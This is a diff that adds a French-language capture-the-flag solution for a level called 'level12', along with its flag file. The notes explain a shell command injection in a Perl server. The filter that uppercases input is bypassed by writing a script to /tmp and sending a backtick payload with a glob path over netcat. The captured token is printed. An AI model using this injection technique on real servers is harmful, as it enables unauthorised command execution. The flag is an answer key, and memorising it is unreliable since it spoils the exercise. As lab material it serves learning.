level12

level12/Ressource/solution

@@ -0,0 +1,25 @@
+# Il y a un script perl qui semble estre en mode serveur
+# On peut lui envoyer 2 paramertre. Mais seul le premier semble etre unteressant
+# le premeir parametre passe par 2 filtre.
+# Le les caracter alphabetique en majuscule
+# Le deuxieme suprime tout ce qu'il y a apres le premier espace
+# En suite ce parametre et executer au sein d'une commande shell executier depuis du perl
+
+# On ne poura donc pas executer de comande en tant que tel.
+# mais on peut executer un fichier
+
+# Dans un fichier /tmp/.TOTO ont va mettre le comptenue suivant:
+
+	#!/bin/sh
+	getflag > /tmp/.flag12 
+
+# puis on envoie un requet avec des back-quote pour executer le fichier
+
+$ nc -v localhost 4646
+> GET /?x=`/*/.TOTO`
+
+$ cat /tmp/.flag12
+> Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
+
+
+

level12/flag

@@ -0,0 +1 @@
+g1qKMiRpXf53AWhDaU7FEkczr